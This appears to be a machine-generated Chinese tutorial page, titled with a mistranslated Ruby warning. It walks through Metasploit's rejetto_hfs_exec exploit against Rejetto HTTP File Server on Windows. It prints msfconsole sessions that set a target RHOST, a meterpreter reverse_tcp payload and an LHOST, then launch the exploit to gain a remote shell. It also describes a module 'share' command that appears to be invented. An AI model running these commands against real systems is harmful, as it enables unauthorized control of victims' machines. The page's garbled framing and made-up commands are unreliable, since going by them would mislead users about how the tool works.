📜  usr 共享 metasploit-framework 模块利用 windows http rejetto_hfs_exec.rb:110: 警告:URI.escape 已过时 (1)

📅  最后修改于: 2023-12-03 15:35:32.714000             🧑  作者: Mango

主题:使用 Metasploit 框架共享 rejetto_hfs_exec.rb 模块来利用 Windows 上的 HTTP 漏洞

Metasploit 是专门用于渗透测试的安全工具。它使用模块化的方式来进行攻击,并且支持多种操作系统和网络协议。本文将介绍如何在 Windows 系统上利用 Metasploit 中的 rejetto_hfs_exec.rb 模块漏洞,以及如何使用 Metasploit 框架共享模块。

准备工作

在开始之前,我们需要先准备以下环境:

  1. 安装 Metasploit 框架
  2. 在 Windows 系统上运行 HTTP 服务器(例如 Rejetto HTTP File Server)
Metasploit 框架共享模块

在 Metasploit 中,共享模块是指可以让其他用户使用的自定义模块。通过将自己编写的模块共享出去,可以帮助其他用户提高攻击效率,并且可以通过分享模块来促进安全社区的发展。下面是如何创建共享模块的步骤:

  1. 将你的模块添加到 Metasploit 框架中(模块语言为 Ruby)
  2. 执行 loadpath 命令,将模块添加到 Metasploit 的搜索路径中
  3. 执行 reload_all 命令,重新载入所有模块。你应该能够在 console 中看到你的模块
  4. 执行 share 命令,将模块共享出去。你需要提供模块名、模块描述以及作者信息

下面是一个例子,展示如何共享 rejetto_hfs_exec.rb 模块:

msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) > set RHOST 192.168.1.10
msf exploit(rejetto_hfs_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(rejetto_hfs_exec) > set LHOST 192.168.1.20
msf exploit(rejetto_hfs_exec) > exploit

msf exploit(rejetto_hfs_exec) > loadpath /root/mymodules/
msf exploit(rejetto_hfs_exec) > reload_all
msf exploit(rejetto_hfs_exec) > share rejetto_hfs_exec "Exploit for Rejetto HFS" "Peter Parker"
利用 rejetto_hfs_exec.rb 模块

在共享了 rejetto_hfs_exec.rb 模块之后,接下来我们可以使用它来进行攻击。该模块利用了 Rejetto HTTP File Server 中的漏洞,通过发送恶意的请求,可以将一个恶意的文件上传到服务器上,然后执行该文件,从而获取系统的控制权。下面是如何使用 rejetto_hfs_exec.rb 模块的步骤:

  1. 在 Metasploit 中使用 use 命令,并设置 RHOSTPAYLOADLHOST
  2. 执行 exploit 命令,发起攻击。如果攻击成功,你将会进入 meterpreter shell。这样你就可以控制被攻击的计算机了。
msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) > set RHOST 192.168.1.10
msf exploit(rejetto_hfs_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(rejetto_hfs_exec) > set LHOST 192.168.1.20
msf exploit(rejetto_hfs_exec) > exploit
结论

在本文中,我们介绍了如何使用 Metasploit 框架共享模块,并利用 rejetto_hfs_exec.rb 模块来攻击 Windows 系统中的 HTTP 漏洞。共享模块能够让我们更高效地进行攻击,也能够促进安全社区的发展。当然,同时我们要遵守道德准则,不要将攻击方式用于非法的目的。